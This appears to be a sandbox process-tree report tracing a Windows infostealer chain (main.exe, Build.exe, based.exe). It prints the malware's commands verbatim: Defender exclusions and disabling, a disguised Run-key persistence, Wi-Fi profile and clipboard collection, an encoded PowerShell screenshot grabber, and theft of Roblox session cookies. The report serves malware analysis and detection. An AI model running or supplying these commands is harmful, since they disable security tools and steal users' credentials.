C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1188
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:7860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1280

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1440
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1812

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2516

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2580

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2616

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:904

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3316
- C:\Users\Admin\AppData\Local\Temp\main.exe
  "C:\Users\Admin\AppData\Local\Temp\main.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1956
- - C:\Users\Admin\AppData\Local\Temp\main.exe
    "C:\Users\Admin\AppData\Local\Temp\main.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI19562\Build.exe -pbeznogym
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4732
    - - C:\Users\Admin\AppData\Local\Temp\_MEI19562\Build.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI19562\Build.exe -pbeznogym
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4380
      - C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2264
        
        C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI22642\s.exe -pbeznogym
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1092
        
        C:\Users\Admin\AppData\Local\Temp\_MEI22642\s.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI22642\s.exe -pbeznogym
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4988
        
        C:\ProgramData\main.exe
        
        "C:\ProgramData\main.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4308
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9DC6.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9DC6.tmp.bat
        11⤵
        
        PID:5188
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 4308"
        12⤵
        Enumerates processes with tasklist
        
        PID:5144
        
        C:\Windows\system32\find.exe
        
        find ":"
        12⤵
        
        PID:5132
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        12⤵
        Delays execution with timeout.exe
        
        PID:5596
        
        C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:5944
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        13⤵
        
        PID:3984
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        14⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:6916
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3496
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of WriteProcessMemory
        
        PID:3632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:4772
        
        C:\ProgramData\setup.exe
        
        "C:\ProgramData\setup.exe"
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1880
      - C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2368
        
        C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍   .scr'"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍   .scr'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1808
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2076
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:1432
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:4532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        8⤵
        
        PID:4340
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        8⤵
        
        PID:4604
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        9⤵
        
        PID:3736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:3488
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        8⤵
        
        PID:1664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        8⤵
        
        PID:4936
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        9⤵
        Gathers system information
        
        PID:1456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        8⤵
        
        PID:3304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4844
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xlgjksqa\xlgjksqa.cmdline"
        10⤵
        
        PID:7192
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES91FF.tmp" "c:\Users\Admin\AppData\Local\Temp\xlgjksqa\CSC45A4AE4FD3F42D79242D63D84D284AB.TMP"
        11⤵
        
        PID:7308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:6740
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:6920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7008
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7116
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7204
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:3244
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:7632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
